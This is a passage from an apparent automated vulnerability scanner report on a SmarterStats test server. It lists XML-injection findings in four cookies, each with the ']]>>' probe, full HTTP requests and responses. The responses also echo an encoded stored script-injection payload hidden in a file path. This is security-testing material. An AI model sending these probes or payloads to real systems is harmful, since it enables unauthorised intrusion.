X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [loginsettings cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott]]>>; SelectedLanguage=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}; STTTState=
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:37 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}]]>>; SelectedLanguage=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:55 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEzMzA1ODgwMQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPFgIeB1Zpc2libGVoZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BbsEPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPkltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPjwvZGl2PmQCCA8WAh8CaGRkvhHdspcJKxLPz9qe3eyR5QNnEJr+H1LfcMEm11gTyGU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.6. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STTTState cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=]]>>; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:04 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEzMzA1ODgwMQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPFgIeB1Zpc2libGVoZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BbsEPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPkltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPjwvZGl2PmQCCA8WAh8CaGRkvhHdspcJKxLPz9qe3eyR5QNnEJr+H1LfcMEm11gTyGU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [SelectedLanguage cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=]]>>; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:56 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7086



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
